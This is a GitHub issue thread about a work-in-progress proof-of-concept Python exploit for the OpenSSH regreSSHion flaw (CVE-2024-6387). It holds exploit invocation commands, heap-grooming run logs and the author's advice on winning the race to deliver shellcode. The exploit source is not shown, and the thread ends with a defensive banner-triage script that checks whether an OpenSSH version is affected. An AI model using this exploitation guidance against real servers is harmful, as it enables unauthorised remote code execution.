l-urk / CVE-2024-6387

Proof of concept python script for regreSSHion exploit.

Terminate in attempt 1 #3

Open BeforeGodKnows opened 2 months ago

BeforeGodKnows commented 2 months ago

python3 regreSSHion.py --ip 172.17.0.2 --port 22 -z
INFO. : attempting to connect to 172.17.0.2:22 (attempt 1)
INFO. : connection established
INFO. : SSH intitiating handshake
INFO. : SSH sent version string.
INFO. : SSH received 21 bytes
INFO. : SSH handshake successful
INFO. : KEX_INIT intitiating handshake
INFO. : KEX_INIT sent payload
INFO. : KEX_INIT received 1024 bytes
INFO. : KEX_INIT handshake successful
INFO. : preparing heap
INFO. : sent tcache chunk 1

I used your script on Ubuntu 18.04-i386 with OpenSSH 9.1p1, but obtained the result above. Then I used Wireshark to capture the packets and found that the server sent the {FIN ACK} after Key Exchange Init. I would like some help understanding why this happened. Or could you please provide your test environment?

l-urk commented 2 months ago

When testing towards a 127.0.0.1 server I noticed that the connection will close prematurely after the handshake. Try python3 regreSSHion.py --ip 172.17.0.2 --port 22 -x and let me know your results please.

l-urk commented 2 months ago

Also please update to the latest version of the script if you have not already as I'm actively working on it and changes are being made progressively.

BeforeGodKnows commented 2 months ago

Thanks for your reply. I updated the script and obtained the results below:

python3 regreSSHion.py --ip 172.17.0.2 --port 22
INFO. : attempting to connect to 172.17.0.2:22 (attempt 1)
INFO. : connection established
INFO. : SSH intitiating handshake
INFO. : SSH sent version string.
INFO. : SSH received 21 bytes
INFO. : SSH handshake successful
INFO. : KEX_INIT intitiating handshake
INFO. : KEX_INIT sent payload
INFO. : KEX_INIT received 1024 bytes
INFO. : KEX_INIT handshake successful
INFO. : preparing heap
INFO. : sent tcache chunk 1

Then, I ran the new script with "-x":

python3 regreSSHion.py --ip 172.17.0.2 --port 22 -x
INFO. : attempting to connect to 172.17.0.2:22 (attempt 1)
INFO. : connection established
WARN! : -x mode enabled, skipping SSH and KEX_INIT handshake
INFO. : preparing heap
INFO. : sent tcache chunk 1
INFO. : sent tcache chunk 2
INFO. : sent tcache chunk 3
INFO. : sent tcache chunk 4
INFO. : sent tcache chunk 5
INFO. : sent tcache chunk 6
INFO. : sent tcache chunk 7
INFO. : sent tcache chunk 8
INFO. : sent tcache chunk 9
INFO. : sent tcache chunk 10
INFO. : sent large and small hole pair 1
INFO. : sent large and small hole pair 2
INFO. : sent large and small hole pair 3
INFO. : sent large and small hole pair 4
INFO. : sent large and small hole pair 5
INFO. : sent large and small hole pair 6
INFO. : sent large and small hole pair 7
INFO. : sent large and small hole pair 8
INFO. : sent large and small hole pair 9
INFO. : sent large and small hole pair 10
INFO. : sent large and small hole pair 11
INFO. : sent large and small hole pair 12
INFO. : sent large and small hole pair 13
INFO. : sent large and small hole pair 14
INFO. : sent large and small hole pair 15
INFO. : sent large and small hole pair 16
INFO. : sent large and small hole pair 17
INFO. : sent large and small hole pair 18
INFO. : sent large and small hole pair 19
INFO. : sent large and small hole pair 20
INFO. : sent large and small hole pair 21
INFO. : sent large and small hole pair 22
INFO. : sent large and small hole pair 23
INFO. : sent large and small hole pair 24
INFO. : sent large and small hole pair 25
INFO. : sent large and small hole pair 26
INFO. : sent large and small hole pair 27
INFO. : sent fake file structure 1
INFO. : sent fake file structure 2
INFO. : sent fake file structure 3
INFO. : sent fake file structure 4
INFO. : sent large string
INFO. : heap preparation complete
INFO. : sock time 0: 0.000000
INFO. : sock time 1: 0.006554 seconds
INFO. : sock time 2: 0.000026 seconds
INFO. : diff time 0: 0.006528 seconds
INFO. : attempting to send final packet
ERROR : socket error: [Errno 104] Connection reset by peer, errno: 104
ERROR : Send final packet error: [Errno 104] Connection reset by peer
ERROR : payload not sent
INFO. : verifying success - sending id command

It also seems like terminating in attempt 1.

l-urk commented 2 months ago

Without -x the program is looking for initial SSH and KEXINIT handshake. Using -x cancels out the initial handshake. It looks like you're sending the entire block of packets and then it is attempting to send the final packet, which is the payload. Try with -r, and if that doesn't work for repeated attempts, manually send until the race condition wins and you're able to send the payload.

Also, are you using an SSH server for the connection server that you're sending the packets to?

whogotpwned commented 2 weeks ago

I have the exact same problem. @l-urk could you provide your testing environment? That would be really helpful. I tried several environments but cannot make the exploit work. Currently I have OpenSSH 9.2 installed on Debian 12.5.0. The attacker is Kali and the connection between them works, as I tested by logging in via SSH.

Running the script gives me:

INFO. : attempting to connect to 192.168.56.103:2222 (attempt 1)
INFO. : connection established
INFO. : SSH intitiating handshake
INFO. : SSH sent version string.
INFO. : SSH received 21 bytes
INFO. : SSH handshake successful
INFO. : KEX_INIT intitiating handshake
INFO. : KEX_INIT sent payload
INFO. : KEX_INIT received 1024 bytes
INFO. : KEX_INIT handshake successful
INFO. : preparing heap
INFO. : sent tcache chunk 1

I tried nearly every combination of flags, but it does not work. Any ideas?

l-urk commented 2 weeks ago

yeah it's stopping around there for localhost to localhost connection. It will keep going if remote, like separate computer. Try running a second OS and attack that way. Please lmk as it's a work in progress. I haven't hit the RCE yet. If you want to see the payload bytes, run a netcat server, attack it, and send back the ssh banner + a kex init handshake string and regreSSHion will continue with injecting the overflowing w bytes then the shellcode payload then the id command...

whogotpwned commented 2 weeks ago

> yeah it's stopping around there for localhost to localhost connection. It will keep going if remote, like separate computer. Try running a second OS and attack that way. Please lmk as it's a work in progress. I haven't hit the RCE yet. If you want to see the payload bytes, run a netcat server, attack it, and send back the ssh banner + a kex init handshake string and regreSSHion will continue with injecting the overflowing w bytes then the shellcode payload then the id command...

It is actually a second environment. 2 VMs, First Debian and second is Kali, where Kali is attacking Debian. I will continue testing, thank you for your response.

l-urk commented 2 weeks ago

Same PC. You need two PCs for the inject for now. I'll look into an update soon.

whogotpwned commented 2 weeks ago

I am still stuck at attempt 1. Got a vulnerable version on a 32-bit Xubuntu. Normal SSH login works again, attacker is Kali Linux in a VM on a Windows machine. Definitely two separate machines.
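The commenters above are trying to work out which server builds are even in scope for CVE-2024-6387. As an added example that is not part of the l-urk/CVE-2024-6387 script, the following defender-side check parses the SSH identification banner a server sends and flags whether the reported upstream OpenSSH version is inside the range the OpenSSH 9.8 release notes list as affected (8.5p1 through 9.7p1). The sample banners are constructed, and distribution builds frequently backport the fix without changing this version number, so a hit means "verify the package patch level", not "vulnerable".

```python
import re
from typing import NamedTuple, Optional

# Constructed sample banners (RFC 4253 identification strings), shaped like the
# 9.1p1 and 9.2 servers mentioned in the thread plus a fixed and a non-OpenSSH one.
SAMPLE_BANNERS = [
    b"SSH-2.0-OpenSSH_9.1p1\r\n",
    b"SSH-2.0-OpenSSH_9.2p1 Debian-2+deb12u3\r\n",
    b"SSH-2.0-OpenSSH_9.8p1\r\n",
    b"SSH-2.0-OpenSSH_8.4p1 Debian-5+deb11u3\r\n",
    b"SSH-2.0-dropbear_2022.83\r\n",
]

# "SSH-2.0-OpenSSH_<major>.<minor>[p<n>][ <vendor comment>]"
_BANNER_RE = re.compile(rb"^SSH-2\.0-OpenSSH_(\d+)\.(\d+)(?:p(\d+))?(?:\s+(.*))?$")

class BannerInfo(NamedTuple):
    version: Optional[tuple]  # (major, minor, portable) or None if not OpenSSH
    vendor_suffix: str        # e.g. "Debian-2+deb12u3"; non-empty means a distro build
    in_affected_range: bool   # 8.5p1 <= version < 9.8p1 per the OpenSSH 9.8 release notes

def parse_banner(banner: bytes) -> BannerInfo:
    """Classify one raw identification string."""
    m = _BANNER_RE.match(banner.rstrip(b"\r\n"))
    if not m:
        return BannerInfo(None, "", False)
    major, minor = int(m.group(1)), int(m.group(2))
    portable = int(m.group(3)) if m.group(3) else 1  # upstream releases are always p1
    suffix = (m.group(4) or b"").decode("ascii", "replace")
    # Builds older than 4.4p1 are also listed as affected; this check ignores that legacy range.
    affected = (8, 5) <= (major, minor) < (9, 8)
    return BannerInfo((major, minor, portable), suffix, affected)

def triage(banners) -> list:
    """One inventory verdict per banner; a range hit means 'verify the patch level'."""
    verdicts = []
    for raw in banners:
        info = parse_banner(raw)
        if info.version is None:
            verdicts.append("not OpenSSH: CVE-2024-6387 does not apply")
        elif not info.in_affected_range:
            verdicts.append("OpenSSH %d.%dp%d: outside affected range" % info.version)
        elif info.vendor_suffix:
            verdicts.append("OpenSSH %d.%dp%d (%s): in affected range, check the package "
                            "changelog for a backported fix" % (*info.version, info.vendor_suffix))
        else:
            verdicts.append("OpenSSH %d.%dp%d: in affected range, upgrade to 9.8p1 or set "
                            "LoginGraceTime 0 in sshd_config as interim mitigation" % info.version)
    return verdicts
```

Run `triage(SAMPLE_BANNERS)` to get one verdict per banner; feeding it banners collected from your own inventory gives a first-pass list of hosts whose package changelogs need checking.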